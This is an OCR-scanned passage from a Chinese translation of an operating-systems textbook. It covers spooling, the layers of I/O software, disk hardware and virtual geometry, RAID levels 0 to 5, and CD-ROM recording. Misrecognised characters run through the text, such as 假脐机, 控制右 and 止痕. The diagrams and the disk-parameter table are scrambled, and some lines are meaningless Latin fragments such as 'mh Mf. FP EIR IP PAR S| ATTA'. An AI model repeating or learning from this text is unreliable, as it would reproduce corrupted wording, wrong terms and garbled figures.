并 非 所 有 的 用 户 层 IO 软件 都 是 由 库 过 程 组 成 的 。 劝 一 个 重要 的 类 
别 是 假 脱 机 系统 。 假 脱 机 〈spooling) 是 多 道 程 序 设计 系统 中 处 理 独 占 
IO 设备 的 一 种 方法 。 考 虑 一 种 典型 的 假 脐 机 设备 : 打印 机 。 尽 管 在 技 
术 上 可 以 十 分 容易 地 让 任何 用 户 进程 打开 表示 该 打印 机 的 字符 特殊 文 
件 ， 但 是 假如 一 个 进程 打开 它 ， 然 后 很 长 时 间 不 使 用 ， 则 其 他 进程 都 无 
法 打印 。 


男 一 种 方法 是 创建 一 个 特殊 进程 ， 称 为 守护 进程 Cdaemon) ， 以 及 
一 个 特殊 目录 ， 称 为 假 脱 机 目录 (spooling directory) 。 一 个 进程 要 打 
印 一 个 文件 时 ， 首 先生 成 要 打印 的 整个 文件 ， 并 且 将 其 放 在 假 脱 机 目录 
下 。 由 守护 进程 打印 该 目录 下 的 文件 ， 该 进程 是 允许 使 用 打印 机 特殊 文 
件 的 惟一 进程 。 通 过 保护 特殊 文件 来 防止 用 户 直 接 使 用 ， 可 以 解决 菏 些 
进程 不 必要 地 长 期 空 占 打 印 机 的 问题 。 





假 脱 机 不 仅仅 用 于 打印 机 ， 还 可 以 在 其 他 情况 下 使 用 。 例 如 ， 通 过 
网 络 传输 文件 间 利 使 用 一 个 网 络 守 护 进 程 。 要 发 送 一 个 文件 到 茶 个 地 
方 ， 用 户 可 以 将 该 文件 放 在 一 个 网 络 假 脱 机 目录 下 。 稍 后 ， 由 网 络 守护 
进程 将 其 取出 并 且 发 送出 去 。 这 种 假 脱 机 文件 传输 方式 的 一 个 特定 用 途 
是 USENET 新 闻 系 统 ， 该 网 络 由 世界 上 使 用 因特网 进行 通信 的 成 干 上 万 
台 计 算 机 组 成 ， 针 对 许多 话题 存在 着 几 干 个 新 闻 组 。 要 友 送 一 条 新 闻 消 
恩 ， 用 户 可 以 调用 新 闻 程序 ， 该 程序 接收 要 及 出 的 消 恩 ， 然 后 将 其 存放 
在 假 脱 机 目录 中 ， 待 以 后 发 送 到 其 他 计算 机 上 。 整 个 新 闻 系 统 是 在 操作 
系统 之 外 运行 的 。 








图 5-17 对 IO 系统 进行 了 总 结 ， 给 出 了 所 有 层次 以 及 每 一 层 的 主要 功 
能 。 从 底部 开始 ， 这 些 层 是 硬件 、 中 断 处 理 程序 、 设 备 驱动 程序 、 与 设 
备 无 关 的 软件 ， 最 后 是 用 户 进 程 。 





层次 IO 应 答 IO 功能 








IO 用 户 进程 ae 
a 式 化 ， 假 脱 机 


aA. TRE. AR, RI 
分 配 


设置 设备 寄存 器 ， 检 查 状态 


与 设备 无 关 的 软件 


设备 驱动 程序 





中 断 处 理 程序 


图 5-17 JILVO 系 统 的 层次 以 及 每 一 层 的 主要 功能 


当 IO 完 成 时 唤醒 驱动 程序 ， 


执行 IO 操作 


图 5-17 中 的 稍 头 表 明了 控制 流 。 例 如 ， 当 一 个 用 户 程序 试图 从 一 个 
文件 中 读 一 个 块 时 ， 操 作 系 统 被 调用 以 实现 这 一 请 求 。 与 设备 无 关 的 软 
件 在 缓冲 区 高 速 绥 存 中 查找 有 无 要 读 的 块 。 如 果 需 要 的 块 不 在 其 中 ， 则 
调用 设备 驱动 程序 ， 同 硬件 及 出 一 个 请 求 ， 让 它 从 磁盘 中 获取 该 块 。 然 
后 ， 进 程 被 阻塞 直到 磁盘 操作 完成 。 








当 磁 盘 操作 完成 时 ， 硬 件 产生 一 个 中 断 。 中 断 处 理 程序 就 会 运行 ， 
它 要 碍 明 发 生 了 什么 事情 ， 也 就 是 说 此 刻 需 要 关注 哪个 设备 。 然 后 ， 中 
盯 处 理 程序 从 设备 提取 状态 信息 ， 唤 醒 休眠 的 进程 以 结束 此 次 IO 请 
求 ， 并 且 让 用 户 进程 继续 运行 。 


5.4 


现在 我 们 开始 研究 某 些 实际 的 IO 设备 。 我 们 将 从 盘 开 始 ， 盘 的 概 
念 简 单 ， 但 是 非常 重要 。 然 后 ， 我 们 将 研究 时 钟 、 键 租 和 显示 器 。 


5.4.1 盘 的 硬件 





盘 具 有 多 种 多 样 的 类 型 。 最 为 党 用 的 是 磁盘 〈 便 盘 和 软盘 )， 它 们 
具有 读 写 速度 同样 快 的 特点 ， 这 使 得 它们 成 为 理想 的 辅助 存储 右 〈 用 于 
分 页 、 文 件 系统 等 ) 。 这 些 盘 的 阵列 有 时 用 来 提供 高 可 靠 性 的 存储 器 
对 于 程序 、 数 据 和 电影 的 发 行 而 言 ， 各 种 光盘 (CD-ROM、 可 刻录 CD 
以 及 DVD) 也 非常 重要 。 在 下 面 各 小 节 中 ， 我 们 首先 描述 这 些 设备 的 硬 
件 ， 然 后 描述 其 软件 。 
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老式 的 磁盘 只 有 少量 的 电子 设备 ， 它 们 只 是 传送 简单 的 串 行 位 流 。 


在 这 些 磁盘 上 ， 控 制 右 做 了 大 部 分 的 工作 。 在 其 他 磁盘 上 ， 特 别 是 在 
IDE (Integrated Drive Electronics， 集 成 驱动 电子 设备 ) 和 SATA (Serial 
ATA， 串 行 ATA) 盘 上 ,磁盘 驱动 器 本 里 包含 一 个 微 控制 器 ， 该 微 控制 
器 承担 了 大 量 的 工作 并 且 人 允许 实际 的 控制 器 发 出 一 组 高 级 命令 。 控 制 器 
经 常 做 磁道 高 速 缓存、 坏 块 重 映射 以 及 更 多 的 工作 。 














对 磁盘 驱动 程序 有 重要 意义 的 一 个 设备 特性 是 :控制 器 是 否 可 以 同 
时 控制 两 个 或 多 个 驱动 器 进行 寻 道 ， 这 就 是 重 登 寻 道 Coverlapped 
seek) 。 当 控制 器 和 软件 等 竺 一 个 驱动 器 完 成 寻 道 时 ， 控 制 器 可 以 同时 
局 动 另 一 个 驱动 器 进行 寻 道 。 许 多 控制 句 也 可 以 在 一 个 驱动 器 上 进行 读 
写 操作 ， 与 此 同时 再 对 为 一 个 或 多 个 其 他 驱动 器 进行 寻 道 ， 但 是 软盘 控 
制 句 不 能 在 两 个 驱动 器 上 同时 进行 该 写 操作 。【〈 读 与 数据 要 求 控制 器 在 
微 秒 级 时 间 太 度 传输 数据 ， 所 以 一 次 传输 就 用 完了 控制 右 大 部 分 的 计算 
能 力 。) 对 于 具有 集成 控制 右 的 硬盘 而 言情 况 就 不 同 了 ， 在 具有 一 个 以 
上 这 种 硬盘 驱动 硕 的 系统 上 上， 它们 能 够 同时 操作 ， 至 少 在 磁盘 与 控制 需 
的 缓冲 存储 器 之 间 进 行 数据 传 输 的 限度 之 内 是 这 样 。 然 而 ， 在 控制 右 与 
主 存 之 间 可 能 同时 只 有 一 次 传输 。 同 时 执行 两 个 或 多 个 操作 的 能 力 极 大 
地 降低 了 平均 存 取 时 间 。 





























图 5-18 比 较 了 最 初 的 IBM PC 标准 存储 介质 的 参数 与 20 年 后 制造 的 磁 
盘 的 参数 ， 从 中 可 以 看 出 过 去 20 年 磁盘 发 生 了 多 大 的 变化 。 有 趣 的 是 ， 
可 以 注意 到 并 不 是 所 有 的 参数 都 具有 同样 程度 的 改进 。 平 均 寻 道 时 间 改 





进 了 7 倍 ， 传 输 率 改进 了 1300 倍 ， 而 容量 的 改进 则 高 达 50 000 倍 。 这 一 
格局 主要 是 因为 磁盘 中 运动 部 件 的 改进 相对 和 组 渐进 ， 而 记录 表面 则 达 


到 了 相当 高 的 位 密度 。 








































































































参数 IBM 360KB 软 盘 WD 18300 硬 盘 
| FEI 10 601 
每 柱 面 磁道 数 12 
每 磁道 扇 区 数 281 CEH) | 
每 磁盘 扇 区 数 35 742 000 
每 扇 区 字 节 数 512 
磁盘 容量 360KB 18.3GB 
寻 道 时 间 〈 相 邻 柱 面 ) 6ms | 0.8ms 
寻 道 时 间 (平均 情况 ) 77ms 6.9ms 
旋转 时 间 200ms 8.33ms 
电动 机 停止 /启动 时 间 250ms 20ms 
传输 1 个 扇 区 的 时 间 | “Tx 








图 5-18 最 初 的 IBM PC 360KB 软 盘 参 数 与 西部 数据 公司 WD 1830088 
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在 阅读 现代 硬盘 的 说 明 书 时 ， 要 清楚 的 事情 是 标 称 的 几何 规格 以 及 
驱动 程序 软件 使 用 的 几何 规格 与 物理 格式 几乎 总 是 不 同 的 。 在 老式 的 磁 
盘 上 ， 每 磁道 扇 区 数 对 所 有 柱 面 都 是 相同 的 。 而 现代 磁盘 则 被 划分 成 环 
带 ， 外 层 的 环 带 比 内 层 的 环 带 拥 有 更 多 的 扇 区 。 图 5-19a 所 示 为 一 个 微 
小 的 磁盘 ， 它 具有 两 个 坏 带 ， 外 层 的 环 带 每 磁道 有 32 个 扇 区 ， 内 层 的 环 
带 每 磁道 有 16 个 局 区 。 一 个 实际 的 磁盘 (例如 WD 18300) 常常 有 16 个 
环 带 ， 从 最 内 层 的 环 带 到 最 外 层 的 环 带 ， 每 个 环 带 的 扇 区 数 增加 大 约 
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图 5-19 a) 具有 两 个 环 带 的 磁盘 的 物理 几何 规格 ; b) 该 磁盘 的 一 种 可 
能 的 虚拟 几何 规格 


为 了 隐藏 每 个 磁道 有 多 少 扇 区 的 细节 ， 大 多 数 现代 磁盘 都 有 一 个 虚 
拟 几 何 规格 呈现 给 操作 系统 。 软 件 在 工作 时 仿佛 存在 着 x 个 柱 面 、y 个 磁 
头 、 每 磁道 z 个 扇 区 ， 而 控制 器 则 将 对 (xyz) 的 请 求 重 映射 到 实际 的 柱 
面 、 磁 头 和 扇 区 。 对 于 图 5-19a 中 的 物理 磁盘 ， 一 种 可 能 的 虚拟 几何 规 
格 如 图 5-19b 所 示 。 在 两 种 情形 中 磁盘 拥有 的 请 区 数 都 是 192， 只 不 过 公 





布 的 排列 与 实际 的 排列 是 不 同 的 。 





对 于 PC 机 而 言 ， 上 述 三 个 参数 的 最 大 值 常常 是 (65535, 16, 





63) ， 这 是 因为 需要 与 最 初 IBM PC 的 限制 向 后 兼容 。 在 IBM PC 机 器 
上 ， 使 用 16 位 、4 位 和 6 位 的 字段 来 设 定 这 些 参数 ， 其 中 柱 面 和 肩 区 从 1 
开始 编号 ,磁头 从 0 开始 编号 。 根 据 这 些 参数 以 及 每 个 肩 区 512 字 节 可 
知 ， 磁 盘 最 大 可 能 的 容量 是 31.5GB。 为 突破 这 一 限制 ， 所 有 现代 磁盘 现 
在 都 支持 一 种 称 为 逻辑 块 寻 址 (logical block addressing, LBA) WA 
统 ， 在 这 样 的 系统 中 ， 磁 盘 扇 区 从 0 开始 连续 编号 ， 而 不 管 磁盘 的 几何 
规格 如 何 。 














2.RAID 


在 过 去 十 多 年 里 ，CPU 的 性 能 一 直 呈 现 出 指数 增长 ， 大 体 上 每 18 个 
月 翻 一 番 。 但 是 磁盘 的 性 能 就 不 是 这 样 了 。20 世 纪 70 年 代 ， 小 型 计算 机 
磁盘 的 平均 寻 道 时 间 是 50 一 100 军 秒 ， 现 在 的 寻 道 时 间 略 微 低 于 10 军 
秒 。 在 大 多 数 技术 产业 《如 汽车 业 或 航空 业 ) 中 ， 在 20 年 之 内 有 5 一 10 
倍 的 性 能 改进 就 将 是 重大 的 新 闻 〈 想 象 300 MPG 的 轿车 中)， 但 是 在 计 
算 机 产业 中 ， 这 却 是 一 个 窘境 。 因 此 ，CPU 人 性 能 与 磁盘 性 能 之 间 的 差距 
随 着 时 间 的 推移 将 越 来 越 大 。 








正如 我 们 已 经 看 到 的 ， 为 了 提高 CPU 的 性 能 ， 越 来 越 多 地 使 用 了 并 
行 处 理 。 在 过 去 许多 年 ， 很 多 人 也 意识 到 并 行 VO 是 一 个 很 好 的 思想 。 
Patterson 等 人 在 他 们 1988 年 写 的 文章 中 提出 ， 使 用 六 种 特殊 的 磁盘 组 织 
可 能 会 改进 磁盘 的 性 能 、 可 靠 性 或 者 同时 改进 这 两 者 〈Patterson 等 人 ， 
1988) 。 这 些 思想 很 快 被 工业 界 所 采纳 ， 并 且 导 致 称 为 RAID 的 一 种 新 








型 IO 设备 的 诞生 。Patterson 等 人 将 RAID 定 义 为 Redundant Array of 
Inexpensive Disk《〈 廉 价 磁盘 元 余 阵 列 ) ， 但 是 工业 界 将 I 重 定义 为 
Independent (737) 而 不 是 Inexpensive 〈 廉 价 ) ， 或 许 这 样 他 们 就 可 以 
收取 更 多 的 费用 ? 因为 反面 角色 也 是 需要 的 〈 如 同 RISC 对 CISC， 这 也 
是 源 于 Patterson) ， 此 处 的 “ 坏 家 伙 ” 是 SLED (Single Large Expensive 


Disk， 单 个 大 容量 昂贵 磁盘 ) 。 


RAID 背 后 的 基本 思想 是 将 一 个 装 满 了 磁盘 的 盒子 安装 到 计算 机 
(通常 是 一 个 大 型 服务 器 ) 上 ， 用 RAID 控 制 器 蔡 换 磁盘 控制 器 卡 ， 将 
数据 复制 到 整个 RAID 上 ， 然 后 继续 常规 的 操作 。 换 言 之 ， 对 操作 系统 
而 言 一 个 RAID 应 该 看 起 来 就 像 是 一 个 SLED， 但 是 具有 更 好 的 性 能 和 更 
好 的 可 靠 性 。 由 于 SCSI 盘 具有 良好 的 性 能 、 较 低 的 价格 并 且 在 单个 控制 
器 上 能 够 容纳 多 达 7 个 驱动 器 《〈 对 宽 型 SCSI 而 言 是 15 个 ) ， 很 目 然 地 大 
多 数 RAID 由 一 个 RAID SCSI 控 制 器 加 上 一 个 装 满 了 SCSI 盘 的 盒子 组 
成 ， 而 对 操作 系统 而 言 这 似乎 就 是 一 个 大 容量 磁盘 。 以 这 样 的 方法 ， 不 
需要 软件 做 任何 修改 就 可 以 使 用 RAID， 对 于 许多 系统 管理 员 来 说 这 可 


是 一 大 卖点 。 











除了 对 软件 而 言 看 起 来 就 像 是 一 个 磁盘 以 外 ， 所 有 的 RAID 都 具有 
同样 的 特性 ， 那 就 是 将 数据 分 布 在 全 部 驱动 器 上 ， 这 样 就 可 以 并 行 操 
作 。Patterson 等 人 为 这 样 的 操作 定义 了 几 种 不 同 的 模式 ， 它 们 现在 被 称 
为 0 级 RAID 到 5 级 RAID。 此 外 ， 还 有 少许 其 他 的 辅助 层级 ， 我 们 就 不 讨 

















论 了 。“ 层 级 ”这 一 术语 多 少 有 一 些 用 词 不 当 ， 因 为 此 处 不 存在 分 层 结 
构 ， 它 们 只 是 可 能 的 六 种 不 同 组 织 形式 而 已 。 





0 级 RAID 如 图 5-20a 所 示 。 它 将 RAID 模 拟 的 虚拟 单个 磁盘 划分 成 条 
珊 ， 每 个 条 带 具 有 k 个 扇 区 ， 其 中 扇 区 0 一 k-1 为 条 带 0， 扇 区 k 一 2k-1 为 条 
WT 


1， 以 此 类 推 。 如 果 k=1， 则 每 个 条 带 是 一 个 扇 区 ; 如 果 k=2， 则 每 个 








条 带 是 两 个 扇 区 ;以 此 类 推 。0 级 RAID 结 构 将 连续 的 条 带 以 轮转 方式 写 
到 全 部 碟 动 器 上 ， 图 5-20a 所 示 为 具有 四 个 磁盘 驱动 硕 的 情形 。 








像 这 样 将 数据 分 布 在 多 个 驱动 器 上 称 为 划分 条 带 〈striping) 。 例 
如 ， 如 果 软 件 发 出 一 条 命令 ， 读 取 一 个 由 四 个 连续 条 市 组 成 的 数据 块 ， 
并 且 数 据 块 起 始 于 条 带 边界 ， 那 么 RAID 控 制 器 就 会 将 该 命令 分 解 为 四 
条 单独 的 命令 ， 每 条 命令 对 应 四 块 磁盘 中 的 一 块 ， 并 且 让 它们 并 行 操 
作 。 这 样 我 们 就 运用 了 并 行 VO 而 软件 并 不 知道 这 一 切 。 








0 级 RAID 对 于 大 数据 量 的 请 求 工 作 性 能 最 好 ， 数 据 量 越 大 性 能 束 越 
好 。 如 果 请 求 的 数据 量 大 于 驱动 喜 数 乘 以 条 市 大 小 ， 那 么 茶 些 驱动 器 将 
得 到 多 个 请 求 ， 这 样 当 它 们 完成 了 第 一 个 请 求 之 后 ， 束 会 开始 处 理 第 二 
个 请 求 。 控 制 器 的 贡 任 是 分 解 请 求 ， 并 且 以 正确 的 顺序 将 适当 的 命令 所 
供给 适当 的 磁盘 ， 之 后 还 要 在 内 存 中 将 结果 正确 地 奢 配 起 来 。0 级 RAID 
的 性 能 是 杰出 的 而 实现 是 简单 明了 的 。 











对 于 习惯 于 每 次 请 求 一 个 山区 的 操作 系统 ，0 级 RAID 工 作 性 能 最 为 


糟糕 。 虽 然 结果 会 是 正确 的 ， 但 是 却 不 存在 并 行 性 ， 因 此 也 就 没有 增进 
性 能 。 这 一 结构 的 另 一 个 劣势 是 其 可 靠 性 潜在 地 比 SLED 还 要 差 。 如 果 
一 个 RAID 由 四 块 磁盘 组 成 ， 每 块 磁盘 的 平均 故障 间隔 时 间 是 20 000 小 
时 ， 那 么 每 隔 5000 小 时 就 会 有 一 个 驱动 器 出 现 故 障 并 且 所 有 数据 将 完 
丢失 。 与 之 相 比 ， 平 均 故 障 间隔 时 间 为 20 000 小 时 的 SLED 的 可 靠 性 要 
mh Mf. FP EIR IP PAR S| ATTA, Seip bE BIEN 
RAID. 





下 一 个 选择 一 一 1 级 RAID 如 图 5-20b 所 示 ， 这 是 一 个 真正 的 RAID。 
它 复 制 了 所 有 的 磁盘 ， 所 以 存在 四 个 主 磁盘 和 四 个 备份 磁盘 。 在 执行 一 
次 写 操作 时 ， 每 个 条 带 都 被 号 了 两 次 。 在 执行 一 次 读 操作 时 ， 则 可 以 使 
用 其 中 的 任意 一 个 副本 ， 从 而 将 负荷 分 布 在 更 多 的 驱动 器 上 。 因 此 ， 写 
性 能 并 不 比 单个 驱动 器 好 ， 但 是 读 性 能 能 够 比 单个 驱动 器 高 出 两 倍 。 容 
错 性 是 突出 的 : 如 果 一 个 驱动 器 般 汗 了， 只 要 用 副本 来 苦 代 就 可 以 了 。 
次 复 也 十 分 简单 ， 只 要 安装 一 个 新 驱动 器 并 且 将 整个 备份 驱动 器 复制 到 
其 上 就 可 以 了 。 
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在 字 的 基础 上 ， 甚 至 可 能 是 字 节 的 基础 上 。 想 象 一 下 将 单个 虚拟 磁盘 的 
每 个 字 节 分 割 成 4 位 的 半 字 节 对 ， 然 后 对 每 个 半 字 节 加 入 一 个 汉 明 码 从 
而 形成 7 位 的 字 ， 其 中 1、2、4 位 为 奇偶 校 验 位 。 进 一 步 想 象 如 图 5-20c 
所 示 的 7 个 驱动 器 在 磁盘 臂 位 置 与 旋转 位 置 方面 是 同步 的 。 那 么 ， 将 7 位 














汉 明 编码 的 字 写 到 7 个 驱动 右上， 每 个 驱动 器 写 一 位 ， 这 样 做 是 可 行 
的 。 


Thinking Machine 公 司 的 CM-2 计 算 机 采用 了 这 一 方案 ， 它 采用 32 位 
数据 字 并 加 入 6 个 奇偶 校 验 位 形成 一 个 38 位 的 汉 明 字 ， 再 加 上 一 个 额外 
的 位 用 于 汉 明 字 的 奇偶 校 验 ， 并 且 将 每 个 字 分 布 在 39 个 磁盘 驱动 器 上 。 
因为 在 一 个 辜 区 时 间 里 可 以 写 32 个 而 区 的 数据 ， 所 以 总 的 吞吐 量 是 巨大 
的 。 此 外 ， 一 个 驱动 器 的 损坏 不 会 引起 问题 ， 因 为 损坏 一 个 驱动 器 等 同 
于 在 每 个 39 位 字 的 读 操作 中 损失 一 位 ， 而 这 是 汉 明 码 可 以 轻松 处 理 的 事 


情 。 

















不 利 的 一 面 是 ， 这 一 方案 要 求 所 有 驱动 如 的 旋转 必须 同步 ， 并 且 只 
有 在 驱动 器 数量 很 充 座 的 情况 下 才 有 意义 《即使 对 于 32 个 数据 驱动 器 和 
6 个 奇偶 驱动 右 而 言 ， 也 存在 19% 的 开销 〉。 这 一 方 采 还 对 控制 器 提出 
许多 要 求 ， 因 为 它 必须 在 每 个 位 时 间 里 求 汉 明 校 验 和 。 





3 级 RAID 是 2 级 RAID 的 简化 版 本 ， 如 图 5-20d 所 示 。 其 中 要 为 每 个 
数据 字 计 算 一 个 奇偶 校 验 位 并 且 将 其 写 入 一 个 奇偶 驱动 器 中 。 与 2 级 
RAID 一 样 ， 各 个 驱动 器 必须 精确 地 同步 ， 因 为 每 个 数据 字 分 布 在 多 个 
IRA) ar Eo 


乍 一 想 ， 似 乎 单个 奇偶 校 验 位 只 能 检测 错误 ， 而 不 能 纠正 错误 。 对 
于 随机 的 未 知 错误 的 情形 ， 这 样 的 看 法 是 正确 的 。 然 而 ， 对 于 驱动 器 出 


y 
D 


Si 


it 这 样 的 情形 ， 由 于 坏 位 的 位 置 是 已 知 的 ， 所 以 这 样 做 完全 能 够 纠正 1 
位 错误 。 如 果 一 个 驱动 器 崩 演 了 ， 控 制 器 只 需 假装 该 驱动 器 的 所 有 位 为 
0， 如 果 一 个 字 有 奇偶 错误 ， 那 么 来 自 废弃 了 的 驱动 器 上 的 位 原来 一 定 
是 1， 这 样 就 纠正 了 错误 。 尽 管 2 级 RAID 和 3 级 RAID 两 者 都 提供 了 非常 
高 的 数据 率 ， 但 是 每 秒 钟 它们 能 够 处 理 的 单独 的 IO 请 求 的 数目 并 不 比 
单个 驱动 器 好 。 
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4 级 RAID 和 5 级 RAID 再 次 使 用 条 市 ， 而 不 是 具有 奇偶 校 验 的 单个 
字 。 如 图 5-20e 所 示 ，4 级 RAID 与 0 级 RAID 相 类 似 ， 但 是 它 将 条 带 对 条 带 
的 奇偶 条 带 写 到 一 个 额外 的 磁盘 上 。 例 如 ， 如 果 每 个 条 带 k 字 节 长 ， 那 
么 所 有 的 条 带 进 行 异 或 操作 ， 就 得 到 一 个 k 字 节 长 的 奇偶 条 带 。 如 果 一 
个 驱动 器 朋 江 了， 则 损失 的 字 节 可 以 通过 读 出 整个 驱动 器 组 从 奇偶 驱动 
器 重新 计算 出 来 。 





这 一 设计 对 一 个 驱动 需 的 损失 提供 了 保护 ， 但 是 对 于 微小 的 更 新 其 
性 能 很 才 。 如 宁 一 个 而 区 被 修改 了 ， 那 么 就 必须 读 取 所 有 的 驱动 器 以 便 
重新 计算 奇偶 校 验 ， 然 后 还 必须 重 写 奇偶 校 验 。 作 为 为 一 选择 ， 它 也 可 
以 读 取 旧 的 用 户 数据 和 旧 的 奇偶 校 验 数据 ， 并 且 用 它们 重新 计算 新 的 奇 
偶 校 验 。 即 使 是 对 于 这 样 的 优化 ， 微 小 的 更 新 也 还 是 需要 两 次 读 和 两 次 
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5, 











结 末 ， 奇 偶 驱 动 器 的 负担 十 分 沉重 ， 它 可 能 会 成 为 一 个 瓶颈 。 通 过 
以 循环 方式 在 所 有 驱动 器 上 均匀 地 分 布 奇 偶 校 验 位 ，5 级 RAID 消 除了 这 








一 瓶 贷 ， 如 图 5-20f 所 示 。 然 而 ， 如 果 一 个 驱动 器 友 生 骨 湛 ， 重 新 构造 故 
障 驱 动 右 的 内 容 是 一 个 非常 复杂 的 过 程 。 
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图 5-20 0 级 RAID 到 5 级 RAID 〈 备 份 驱动 器 及 奇偶 驱动 器 以 阴影 显 





3.CD-ROM 


最 近 几 年 ， 光 盘 《〈 与 磁盘 相对 应 ) 开始 流行 。 光 一 比 传统 的 磁盘 有 具 
有 更 高 的 记录 密度 。 光 盘 最 初 是 为 记录 电视 节目 而 开发 的 ， 但 是 作为 计 
算 机 存储 设备 它们 可 以 被 赋予 更 为 重要 的 用 途 。 由 于 它们 潜在 的 巨大 容 
光盘 一 直 是 大 量 研究 工作 的 主题 ， 并 且 经 历 了 令 人 难以 置信 的 快速 
发 展 。 
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们 的 直径 为 30 cm 并 且 以 LaserVision 的 名 字 上 市 ， 但 是 它们 没有 流行 起 
K (CHERIN à- 





1980 年 ， 飞 利 浦 连 同 索 尼 开 发 了 CD (Compact Disc， 压 缩 光 盘 ) ， 
它 很 快 就 取代 了 每 分 钟 33 1/3 转 的 乙烯 树脂 唱片 来 记录 音乐 〈 艺 术 鉴赏 
家 除外 ， 他 们 仍旧 喜爱 乙烯 树脂 唱片 ) 。CD 的 准确 技术 细节 以 正式 国 
际 标准 CIS 10149) 的 形式 出 版 ， 由 于 其 封面 的 颜色 而 通俗 地 被 称 为 红 
XP (Red Book) 。 (国际 标准 由 国际 标准 化 组 织 发 布 ， 国 际 标准 化 组 
织 是 诸如 ANSI、DIN 等 国家 标准 团体 的 国际 对 等 机 构 。 每 一 个 国际 标准 
都 有 一 个 IS 号 码 。) 将 光盘 以 及 驱动 器 的 规范 作为 国际 标准 出 版 ， 其 目 
的 在 于 让 来 自 不 同音 乐 出 版 商 的 CD 和 来 自 不 同 电子 设备 制造 商 的 播放 
器 能 够 一 同 工 作 。 所 有 的 CD 都 是 直径 120 mm， 厚 度 1.2 mm， 中 间 有 一 





个 15 mm 的 圆 了 九 。 音 频 CD 是 第 一 个 成 功 的 大 众 市 场 数字 存储 介质 。 它 们 
被 设想 应 该 能 够 耐用 100 年 。 请 在 2080 年 进行 核对 ， 看 一 看 第 一 批 CD 还 
能 不 能 很 好 地 工作 。 





一 张 CD 的 准备 分 成 几 个 步骤 ， 包 括 使 用 高 功率 的 红外 激光 在 具有 
涂 层 的 玻璃 母 盘 上 烧 出 许多 直径 为 0.8pm 的 小 孔 。 从 这 张 母 盘 可 以 制作 
出 钴 模 ， 和 铸模 在 激光 孔 所 在 的 位 置 具 有 突起 。 将 熔化 的 聚 碳 酸 酯 树脂 注 
入 这 一 铸模 ， 束 可 以 形成 具有 与 玻璃 母 盘 相同 小 孔 模 式 的 一 张 CD。 然 
后 将 一 个 非常 薄 的 反射 铝 层 沉积 在 聚 碳酸 酯 上 ， 再 加 上 一 层 保护 性 的 漆 
膜 ， 节 后 加 上 一 个 标签 。 聚 碳酸 酯 基 片 中 的 凹陷 处 称 为 止 痕 “pit) » H 
FEZ AAS BOGE XX BOK A Cand) 。 








在 回放 的 时 候 ， 低 功率 的 激光 二 极 管 太 出 波长 为 0.78pgm 的 红外 交 ， 
随 痢 止 痕 和 槽 将 的 通过 照射 在 其 上 。 激 光 在 聚 碳酸 酯 一 面 ， 所 以 止 痕 朝 
独 诉 光 的 方 同 突出 ， 就 像 是 另 一 侧 平 坦 表 面 上 的 突起 一 样 。 因 为 凸 痕 的 
高 度 是 激光 波长 的 四 分 之 一 ， 所 以 从 凹 痕 反 射 回来 的 光线 与 从 周围 表面 
反射 回来 的 光线 在 相位 上 相关 半 个 波长 。 结 果 ， 两 部 分 相 消 干涉 ， 与 从 
槽 疹 反 射 回 的 光线 相 比 只 返回 很 少 的 光线 到 播放 器 的 光电 探测 器 。 这 样 
播放 器 就 可 以 区 分 凹 并 和 槽 月 。 尽 管 使 用 四 痕 记 录 0 并 且 使 用 槽 疹 记 录 1 
看 起 来 非常 简单 ， 但 是 使 用 止 痕 / 槽 有 或 槽 月 / 凹 痕 的 过 湾 来 记录 1 而 用 这 
种 过 渡 的 缺失 来 记录 0 却 更 加 可 靠 ， 所 以 采用 这 一 方案 。 














凹 痕 和 槽 痢 写 在 一 个 连续 螺旋 中 ， 该 螺旋 起 源 于 接近 中 间 圆 孔 的 地 


方 并 且 向 边缘 延伸 出 32 mm 的 距离 。 螺 旋 环 绕 着 光盘 旋转 了 22 188 圈 
(大 约 每 毫米 600 圈 ) ， 如 果 展 开 的 话 ， 它 将 有 5.6 km 长 。 螺 旋 如 图 5-21 
所 示 。 


螺旋 横 





”2K 用 户 数 据 块 


图 5-21 压缩 光盘 或 CD-ROM 的 记录 结构 


为 了 以 均匀 的 速度 播放 音乐 ， 必 须 让 止 并 和 槽 将 以 恒定 的 线 速度 通 
过 。 因 此 ， 当 CD 的 读 出 头 从 CD 的 内 部 癌 外 部 移动 时 ，CD 的 旋转 速度 必 
须 连 续 地 降低 。 在 内 部 ， 旋 转速 度 是 530rpm 以 便 达 到 期 望 的 每 秒 120 cm 
的 流动 速度 ， 而 在 外 部 ， 旋 转速 度 必 须 降 到 200rpm 以 便 在 激光 头 处 得 到 
相同 的 线 速度 。 恒 定 线 速度 驱动 器 与 磁盘 驳 动 右 存 在 相当 大 的 区 别 ， 后 











者 以 恒定 角速度 操作 ， 与 磁头 当前 处 于 什么 位 置 无 天 。 此 外 ，530rpm 与 
大 多 数 磁盘 3600 一 7200rpm 的 旋转 速度 相 比 存在 相当 大 的 距离 。 


1984 年 ， 飞 利 浦 和 索尼 认识 到 使 用 CD 存放 计算 机 数据 的 潜力 ， 所 
以 他 们 出 版 了 黄皮书 (Yellow Book) ， 定 义 了 现在 称 为 CD- 
ROM (Compact Disc-Read Only Memory， 压 缩 光 盘 -只 读 存 储 器 ) 的 光 
盘 的 确切 标准 。 为 了 借助 在 当时 已 经 十 分 牢固 的 音频 CD 市 场 ，CD- 
ROM 在 物理 尺寸 上 与 音频 CD 相同 ， 在 机 械 上 和 光学 上 也 与 之 兼容 ， 并 
且 使 用 相同 的 聚 碳酸 酯 注 模 机 器 生产 。 这 一 决策 的 结果 是 ， 不 但 需要 组 
慢 的 可 变速 度 的 电机 ， 而 且 在 适度 的 销量 下 CD-ROM 的 制造 成 本 将 很 好 
地 控制 在 ] 美 元 以 下 。 











黄皮书 所 定义 的 是 计算 机 数据 的 格式 化 。 它 还 改进 了 系统 的 纠 错 能 
力 ， 这 是 一 个 必要 的 措施 ， 因 为 尽管 音乐 爱好 者 并 不 介意 在 这 里 或 那里 
丢失 一 位 ， 但 是 计算 机 爱好 者 往往 对 此 非常 挑剔 。CD-ROM 的 基本 格式 
是 每 个 字 节 以 14 位 的 符号 进行 编码 。 正 如 我 们 在 前 面 看 到 的 ，14 位 足以 
对 一 个 8 位 的 字 节 进行 汉 明 编码 ， 并 且 剩 下 2 位 。 实 际 上 ，CD-ROM 使 用 
的 是 功能 更 为 强大 的 编码 系统 局 。 对 于 读 操作 而 言 ，14 到 8 映射 是 通过 
查找 表 由 硬件 实现 的 。 








在 下 一 个 层次 上 ,一 组 42 个 连续 符号 形成 一 个 588 位 的 帧 
(frame) 。 每 一 帧 拥有 192 个 数据 位 〈24 个 字 节 ) ， 剩 余 的 396 位 用 于 
